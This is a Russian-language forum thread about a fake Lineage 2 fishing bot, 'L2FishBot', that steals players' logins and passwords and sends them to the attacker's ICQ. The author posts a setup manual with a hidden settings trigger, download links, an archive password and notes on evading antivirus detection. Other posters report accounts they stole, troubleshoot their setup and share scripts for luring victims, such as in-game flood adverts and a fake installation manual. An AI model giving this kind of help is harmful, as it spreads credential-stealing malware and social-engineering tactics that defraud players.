PDA

Просмотр полной версии : Очередной фейк для угона акка-L2FishBot


ExxtanzO
02.03.2010, 14:43
Доброго времени суток!
Вот и пришло время сделать и мне свой фейк! =)
Программа работает под видом Бота-рыбака.
Работает по тому же принципу что и программа монка
(респект ему за подачу идеи создания подобного рода программ),
т.е. тырит логин и пароль и отсылает вам на ICQ.

Мануал:
1) В поле "Логин:" пишем ZhykCheat для перехода в скрытое меню настроек.
[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
2) В окне настроек вписываем свои данные, подобным образом:
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
3) Жмем везде "Изменить" и закрываем окно настроек.
4) Все. Теперь программа сама будет отсылать с "левой" аськи на вашу вводимые жертвой аккаунты в подобном виде: Логин:xxx Пароль:yyy Сервер:zzz
pqUzYx2OGO4

Особенности Версии 1.1:

Поддержка WinXP,Vista,7;
(!)Не палится антивирусами virustotal ([Ссылки могут видеть только зарегистрированные и активированные пользователи] 53c2a75fde1544-1267528636) (всего 1 антивирь принял за вирус, и то я даже такого не знаю=);
Ориентированна на руофф (в списке серверов: cadmus,vasper и т.д.)
Настройки на главной панели программы не несут для нас никакой смысловой нагрузки =) они лишь для придания реалистичности программе;
Написана на Delphi 7. Позже, возможно выложу исходники;



Ссылки 1.1:
slil.ru ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
dump.ru ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
depositfiles.com ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
rghost.ru ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Особенности Версии 1.2:

Проблема с антивирусами решена частично, AVASt и Каспер ругаются;
Ориентированна теперь не только на Руофф, но и на топовые ГФШ;
Пересмотрен и изменен дизайн программы;



Ссылки 1.2:
slil.ru ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
rghost.ru ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
пасс на архив zhyk.ru

P.S. Программа будет дополняться и изменяться, оставляйте свои пожелания, сообщайте о ошибках и багах.
P.P.S. Спасибо Dinmaite ([Ссылки могут видеть только зарегистрированные и активированные пользователи]) за помощь в моих глупых вопросах...

[Ссылки могут видеть только зарегистрированные и активированные пользователи]Обновилась версия![Ссылки могут видеть только зарегистрированные и активированные пользователи]
НЕ ПРОВЕРЯЙТЕ НА ВИРУСТОТАЛЕ, иначе завтра все антивири будут палить прогу как троян.
Замена вирустоталу ТУТ ([Ссылки могут видеть только зарегистрированные и активированные пользователи]), перед сканированием поставить галочку!

Особенности Версии 1.3:

(!)Проблема с антивирусами решена (тырк ([Ссылки могут видеть только зарегистрированные и активированные пользователи])), т.е. такие антивирусы как Каспер, Нод, ДрВеб, Аваст не кричат теперь что это вирус;
Появилась возможность добавления своего сервера, под который хотите выставлять фейк (видеомануал по добавлению сервера ниже);
Немного изменен дизайн программы;


SggbmxUtRtM

Ссылки 1.3:
slil.ru ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
rghost.ru ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
dump.ru ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

пасс на архив zhyk.ru

так поясню сразу разжеванно:

Что такое ICQ №1?
Это Ваш ICQ номер пароли и логины жертвы вам будут приходить на него! И программе пароль от него не требуется!

Что такое ICQ №2?
ICQ №2 - это ICQ который вы регаете специально для бота. Бот будет заходить на этот номер и отправлять вам данные сам! Вот зачем ему и нужен ICQ номер и пароль от него. Зарегистрируйте ICQ номер для бота тут [Ссылки могут видеть только зарегистрированные и активированные пользователи] .

В связи с последними событиями на л2.ру в программу добавлен сервер Atlant!
Удачного развода!
Скачать|Download ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
пароль на архив zhyk.ru

HellFire
02.03.2010, 19:04
никогда не делай проверку на вирус тотале, через день или 2 твоя прога будет палиться всеми =/

ExxtanzO
02.03.2010, 19:13
Поправил баг с несохранением данных, пробуйте

ExxtanzO
02.03.2010, 20:36
Толку 0, при перезапуске программы все настройки слетают. Win 7 32

Или я криворук? О.о

Тестилось у 3х людей на 3х системах ХПх64, Виста, 7х32
На данный момент у троих все работает на ура! М.б. ты по старым ссылкам качал? скачай по новым
можешь отписать в аську если не заработает

maxi-bum
03.03.2010, 06:45
Вопрос к автору
как можно исправить линки на сервера то есть не на руофф а на какойнибудь другое ?

Mmouse
03.03.2010, 09:44
Каспер распознал и удалил как трояна Trojan.Win32.Agent.dlgz

F4ll3nL0rD
03.03.2010, 10:43
Автор а ты не мог бы сделать так, чтобы в поле где вводишь аськи, можно было вводить сервер?

poins
03.03.2010, 11:18
Каспер распознал и удалил как трояна Trojan.Win32.Agent.dlgz
никогда не делай проверку на вирус тотале, через день или 2 твоя прога будет палиться всеми =/
ну вот чего и требовало ожидать (

ExxtanzO
03.03.2010, 11:38
Автор а ты не мог бы сделать так, чтобы в поле где вводишь аськи, можно было вводить сервер?

Вопрос к автору
как можно исправить линки на сервера то есть не на руофф а на какойнибудь другое ?
В версии 1.2 будет ориентация под другие сервера
ну вот чего и требовало ожидать (
а что только я мог его на вирус тотал залить?)
половина скачавших проверили файл на вирустотале
в версии 1.2 изменю код и все будет нормально

Mihail1oo5oo
06.03.2010, 11:20
[CENTER]




Адаптируй для l2r.ru (la2.raid.ru) пожалуйста.
:z::ban:

Добавлено через 2 минуты
внесенные данные не сохраняются ... версия 1.2

DMSnik
06.03.2010, 12:16
а эту прогу мона использовать как фишбот?))):rolleyeyes:

dd2
06.03.2010, 12:34
Наврятли=), это только фейк под бота.

PavelQwa
06.03.2010, 12:58
Пример(очень даже убедительный)развода с помощью проги Exxtanzo "l2fisher":



Вот представляю вам полностью рабочую la2fish для руоффа. С помощью этой программы можно заработать кучу денег!
Суть этой программы в том что эта программа будет рыбачить за вас!!!!!
Как вы наверняка знаете... Если бот просидит целую ночь рыбача, на следующее утро у вас будет как минимум 50кк!!!!!!

Подробная инструкция по использованию в картинках:
[Ссылки могут видеть только зарегистрированные и активированные пользователи]******.net/upload/a26cb0e2.png

Ссылка на самого бота:
[Ссылки могут видеть только зарегистрированные и активированные пользователи]

nofet
07.03.2010, 08:49
Антивирь начал визжать... Первый день после скачки норм было, а потом... видать ктото проверил его там где не надо...

xFessx
10.03.2010, 14:14
Extanzo, если не влом кинь мануал в асю по добавлению серва в прогу или сам добавь серв l2-wos(фришка) ася 453377873

ExxtanzO
10.03.2010, 16:05
Extanzo, если не влом кинь мануал в асю по добавлению серва в прогу или сам добавь серв l2-wos(фришка) ася 453377873

В версии 1.3 будет возможность самим вам добавлять свои сервера, с которых будете угонять акки, следовательно и мануал тоже будет:agreed:

TPyCuIIIKa
10.03.2010, 18:25
Да,пожалуй ждем 1.3 и тогда уж можно будет проверить в деле.
а так,кто то уже угнал? чет никто не отписывает есть че или нет?)

xFessx
11.03.2010, 15:12
Я нарезал))))))) ток на серве который первый раз вижу чото там с киевом связано
З.Ы. Ждемс 1.3...=)

PavelQwa
11.03.2010, 15:22
Да,пожалуй ждем 1.3 и тогда уж можно будет проверить в деле.
а так,кто то уже угнал? чет никто не отписывает есть че или нет?)

Я угнал 6 акков на сервере своего города. Прога действительно помогает навариться=))

Прога кулл,пусть м0нк не обижаетцо ,но ученик превзошел мастера


Ну надоже было такое сказать) Тем самым унизив их обоих:D

Jumper
12.03.2010, 23:26
extanzo, слу, а icq компонент ставится ТОЛЬКО на делфи фул, на лайт не сойдет?????

а то у мну delphi 10 lite и когда пытаюсь добавить компонент пишет ошибку...
дай мне самый новый норм делфи, хотябы название =)
7 не надо)

ExxtanzO
13.03.2010, 04:09
extanzo, слу, а icq компонент ставится ТОЛЬКО на делфи фул, на лайт не сойдет?????

а то у мну delphi 10 lite и когда пытаюсь добавить компонент пишет ошибку...
дай мне самый новый норм делфи, хотябы название =)
7 не надо)

Delphi 2010 помоему самая новая, Но у меня 7 delphi это самая удачная сборка

lamo
13.03.2010, 17:55
Блин я не понимаю, а как узнать пароль от аськи №2??

lamo
13.03.2010, 18:15
ааа поняла спасибо тебе)

Добавлено через 2 минуты
А в добавление сервера что писать? HTML или ip?

Mihail1oo5oo
13.03.2010, 18:21
ааа поняла спасибо тебе)

Добавлено через 2 минуты
А в добавление сервера что писать? HTML или ip?

урл серва ёба :)
пример: la2.raid.ru

lamo
13.03.2010, 18:24
А потом после таго как все сделала нажала изменить и т д, потом что делать надо?

Добавлено через 4 минуты
У меня пишет ошибка при загрузки данных) Что делать?

Добавлено через 1 час 14 минут
Пишет ошибка при загрузке данных... Помогите!

Mihail1oo5oo
13.03.2010, 20:13
А потом после таго как все сделала нажала изменить и т д, потом что делать надо?

Добавлено через 4 минуты
У меня пишет ошибка при загрузки данных) Что делать?

Добавлено через 1 час 14 минут
Пишет ошибка при загрузке данных... Помогите!

попробуй скачать заного, выключи антивирус....
ЗЫ: ОГРОМНЕЙШЕЕ СПАСИБО Экстанзо! Взломал БД 65 на х5 в Б шмоте... конечно для меня это не так нужно, но всё таки круто что работает!

lamo
13.03.2010, 20:42
Скачала заного, антивирус оффнула,всеравно пишет: Ошибка при загрузке данных...
Вопрос а логин и пароль любой вводить?

Mihail1oo5oo
13.03.2010, 20:46
Скачала заного, антивирус оффнула,всеравно пишет: Ошибка при загрузке данных...
Вопрос а логин и пароль любой вводить?

В поле логин пиши ZhykCheat, вылезет окно с настройкой, регай новую ICQ на сайте [Ссылки могут видеть только зарегистрированные и активированные пользователи] , в окне настройки укажи свой основной ICQ, в других полях укажи номер свежезареганной ICQ и пароль от неё.
Сохраняй и вуаля!
ЗЫ:Ээто не бот-рыбак! ЭТО УГОН АККАУНТОВ!!!!

lamo
13.03.2010, 20:49
Да я не на столько дура, я всё сделала парвильно, по видео и секретное окошко открыла и т д. Но почему то всеравно соеднинение разрывает(

Добавлено через 15 минут
Соединение с сервером...
Соединение с сервером установлено.
Ошибка при загрузке данных...

Mihail1oo5oo
13.03.2010, 21:17
Да я не на столько дура, я всё сделала парвильно, по видео и секретное окошко открыла и т д. Но почему то всеравно соеднинение разрывает(

Добавлено через 15 минут
Соединение с сервером...
Соединение с сервером установлено.
Ошибка при загрузке данных...

дак и не доджно соеденять!!!!! когда вводишь, коннект, выдаёт ошибку и пароли приходят на указанную ICQ.. всё ушёл спать :)

Modern
13.03.2010, 21:42
Ну я всё сделал и чо теперь? Ждать? И долго?

Добавлено через 16 минут
Странно чото не приходит ничего... Ток с самого начало пришол логин и пароль от моего аккаунта каторый я ввёл и всё... Сколько ждать то надо целый день чтоль?

LostHorror
13.03.2010, 23:45
Ну я всё сделал и чо теперь? Ждать? И долго?

Добавлено через 16 минут
Странно чото не приходит ничего... Ток с самого начало пришол логин и пароль от моего аккаунта каторый я ввёл и всё... Сколько ждать то надо целый день чтоль?

Совсем что ли "здравствуй дерево"?
Поражаюсь некоторым людям...
Ты должен впихнуть этот "бот для рыбалки" кому-нибудь, кто играет на твоем серваке, и если этот человек введет там свой лог и пасс, то тебе он придет в аську.

ExxtanzO
14.03.2010, 10:09
вы что уже?) это не бот! это фейк бота)

LostHorror
14.03.2010, 14:24
я вник в твой пост, как ты всё блондинкам разъясняешь :)
ваще чуть не лопнул:notme:

Ну надо же помогать людям :)

Вот, допустим, мой вариант развода:

1) Ставим флуд-бота на свой сервер куда-нибудь в людное место (тот же Гиран) с текстом вроде
"Уникальный рыбный бот, не имеющий аналогов! Весь интерфейс предельно прост и понятен!
Отличный заработок, минимум усилий, стань лучшим рыбаком на сервере!
Ссылка на скачивание: "линк на бота в инете"

2) В архив с прогой засовываем мануал по установке + я влепил пару файлов от l2walker (.dll/.ini/.jpg), чтобы бот казался весомее.
Вот мой мануал:

Мануал по установке рыбного бота предельно прост, и понятен каждому.
Ниже описана последовательность действии для запуска данного бота.

Инструкция:
1) Запустите L2FisherBotv1.3
2) Укажите тип сервера: l2.ru или Free-сервера
3) Если сервер free, то укажите его № в списке. Допустим комплекс серверов asterios: Вы играете на Hardin x5, выбирайте №3.
4) Поставьте галочки в пунктах "Отключить GameGuard" и, если нужно, "Переподключаться при дисконекте".
5) Выберите нужные Вам настройки (все предельно понятно, думаю расписывать не стоит)
6) Введите свой Логин и Пароль и жмите "Подключиться".
7) Поставьте назначение клавиш то, которое должно совпадать с клиентом. Допустим хилка у вас стоит на F5 - ставьте "Назначение клавиши F5", одевание/снятие удочки на F1 - ставьте там F1 и т.д.
8) Нажимайте кнопку "Начать рыбалку" и уходите пить чай :)

Удачной Вам ловли!

3) Надеемся и ждем, что народ поведется, и к вам в руки попадут хорошие аккаунты :)

Mihail1oo5oo
14.03.2010, 14:25
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
я в слезах:cry::cry::cry:
Этого модера я развел с помощью этого самого фейка под бота:voin::voin::voin:
PS: 352 человека скачало :)

VeelZevuL
17.03.2010, 13:51
а как бот она не работает?))) ток тырит?

KyM
17.03.2010, 14:06
а как бот она не работает?))) ток тырит?

Да ток тырит.


Илья а такое возможно чтоб этот фейк еще и работал как бот?

LostHorror
17.03.2010, 14:24
Да ток тырит.


Илья а такое возможно чтоб этот фейк еще и работал как бот?

Вот это кстати вообще красота была бы - человек запустит реального бота, будет думать, что все норм, а ты будешь знать его акк и пасс :)

poins
18.03.2010, 14:28
Вот это кстати вообще красота была бы - человек запустит реального бота, будет думать, что все норм, а ты будешь знать его акк и пасс :)

Такая красота ЕСТЬ и называется ТРОЯН :emolol:

ExxtanzO
18.03.2010, 16:50
Да это будет именно троян, так что мне делать подобное не стоит, найдите сами троян да прикрепите.
Все что я могу сделать так это анимацию рыбалки, но человек может спалить через 2 окно что его персонаж нифига не рыбачит и даже не заходит и бегом побежит менять пароль, поэтому есть ли смысл?

Mihail1oo5oo
21.03.2010, 13:28
Илья, реализуй уже 1.4 с анимацией ....
2ым окном никто не будет проверять:bl::bl:

psyDARKpsy
22.03.2010, 09:11
в настройках нифига не сохраняется ((( даже ненаю чё делать(

ExxtanzO
22.03.2010, 09:32
в настройках нифига не сохраняется ((( даже ненаю чё делать(

Делай все как на видео и будет нормально все.
Работает 100%, посмотри видео и повтори действия

psyDARKpsy
22.03.2010, 18:42
во гуд) всё робит) за прожку автору респа) пригодится! PS. Стоит уточнить что при вызове секретной настройки все поля чистые! а то я пока был не за компом чуть голову не сломал) уже хотел в конфигурации начать шукать! но дай боже всё ништячно)

MOUNTAIN
23.03.2010, 09:18
на видео не видно что вписано в поле добавить сервер, если нужен сервер руофа то что вписать? подскажите пожалуйста

PavelQwa
23.03.2010, 09:23
на видео не видно что вписано в поле добавить сервер, если нужен сервер руофа то что вписать? подскажите пожалуйста
Ничего не нада. Все сервера руоффа уже добавлены.

MOUNTAIN
23.03.2010, 09:25
а вот все ввел перезапускаю и в окне настройки уже пусто, предположим что сохранилось, что делать дальше? 2 файла программы запаковать в архив и кинуть прогу тому кого хочу ломануть?

ExxtanzO
23.03.2010, 09:36
а вот все ввел перезапускаю и в окне настройки уже пусто, предположим что сохранилось, что делать дальше? 2 файла программы запаковать в архив и кинуть прогу тому кого хочу ломануть?
То что поля потом пустые не пугайся, если сделал все пошагово как на видео то все сохранилось, и ICQ куда придет и ICQ с которого бот тебе сам напишет.

Теперь можешь кинуть другу потестировать, или сам зайди введи любой логин и пароль и они тебе придут на ICQ.

Далее для развода кидаешь жертве архив с .ехе файлом и config.ini под видом бота и ждешь пока жертва введел логин и пароль которые придут тебе.

MOUNTAIN
23.03.2010, 09:37
спасибо за скоростной ответ) щас проверю

Добавлено через 4 минуты
хм, пишет - поля логина и пароля не должны быть пустыми, и ничего не происходит. Во все, сделал все заново ввел логин и он пришел

GattoNero
23.03.2010, 10:28
у меня тож такая лажа...вроде ввел аськи и протестил...все норм приходит...теперь сохранил и закрыл прогу...затем открыл прогу вписываю логин и пасс и мне выскакивает ошибка "Логин и пароль должны содержать более 1 символа"...подскажите что не так?

Mihail1oo5oo
23.03.2010, 13:00
2pw > перекачай заного, и когда вводишь данные(ICQ и пароли) жми изменить по 4 раза.. глупо... но мне помогло:pandal:


ЗЫ: ещё раз спасибо экстанзо [Ссылки могут видеть только зарегистрированные и активированные пользователи] смотрим и смеёмся:z::z::z:

MOUNTAIN
23.03.2010, 14:55
сложновато кого нить заставить скачать бота )

ExxtanzO
23.03.2010, 15:25
сложновато кого нить заставить скачать бота )

Нужно умение убеждать, судя по тому сколько люди им развели то совсем не сложно.

Mihail1oo5oo
23.03.2010, 18:06
все сразу посылают лесом

поройся по топику, и поищи мои посты.... 2 ссылки есть с форума с шумом о боте-рыбаке....
Благодаря ЭкстанзО(спасибо ему ещё раз) я намутил:
ШС 77(скиллы 78) с сабой биш 51... на х5
Мало конечно... НО(!) т.к вещи были ворованные - я продавал их очень дешево.

FEWKEE
24.03.2010, 11:29
Хороший фейк, но я думаю, что на него будут попадатсья нубки до А грейда, ищущие легких денег))Вот еслиб фейк радар сделать (типа бесплатный ренжер или л2контрол и тд) на него "рыбка" покрупней должна повестись). Но это мое мнение, сам пока не пробовал.)

Mihail1oo5oo
24.03.2010, 13:39
Хороший фейк, но я думаю, что на него будут попадатсья нубки до А грейда, ищущие легких денег))Вот еслиб фейк радар сделать (типа бесплатный ренжер или л2контрол и тд) на него "рыбка" покрупней должна повестись). Но это мое мнение, сам пока не пробовал.)

на низкорейтовых серверах ведутся все, кроме донов и чрезмерно богатых игроков ...

xxxBB
01.04.2010, 05:51
вот пока что тока тестил... от руофа на осю проходят пароль а от шока абуса и т д не приходят... что не так?

FOXTROT8771
08.04.2010, 21:59
Для того чтобы бот отправил логин и пас нужно чтобы аська была постоянно в онлайне?

Mihail1oo5oo
11.04.2010, 09:01
Для того чтобы бот отправил логин и пас нужно чтобы аська была постоянно в онлайне?

Нет, с машины жертвы отправляется инфа, которая приходит тебе в ICQ, в ICQ можно не заходить, просто придут пароли в "офф-лайн", зайдешь и прочитаешь

Shakal1990
11.04.2010, 18:07
Какой пас на архив?))

s3ndr1ck-
11.04.2010, 22:36
пасс от архивов - zhyk.ru

^[D[a]rK]^
21.04.2010, 16:57
Недоработка :
Версия : 1.3
Баг : В окнах написано L2fisher bot v1.3 а внизу(рядом с треем) написано L2FisherBot v1.1 beta o_O , почените пожалуйста)

razorvanec
23.04.2010, 23:53
У меня почему-то ничего не сохраняет... я все ввожу потом выхожу с проги и все пропадает.... Помоги...

Davy
24.04.2010, 07:47
У меня почему-то ничего не сохраняет... я все ввожу потом выхожу с проги и все пропадает.... Помоги...

что именно не сохраняет? настройки аськи? или настройки бота:d )) аську должно сохранить в настройки бота та нет, ( ну ты наверное понимаешь, что это на самом деле не бот )

vlaha
24.04.2010, 16:19
Долго мучался - думал не пашет что-то...Потом дошло,что у меня в аське стоит антибот защитко...
з.ы. ТС,сделай что бы,если не выбрать сервер,писало "Выберите сервер" и не "коннектило",но данные высылало :D

X-COM
25.04.2010, 04:01
Хотелось бы увидеть кроме отсылки на аську- отсылку на скайп. Будет ли такое реализовано, и возможно ли? спс.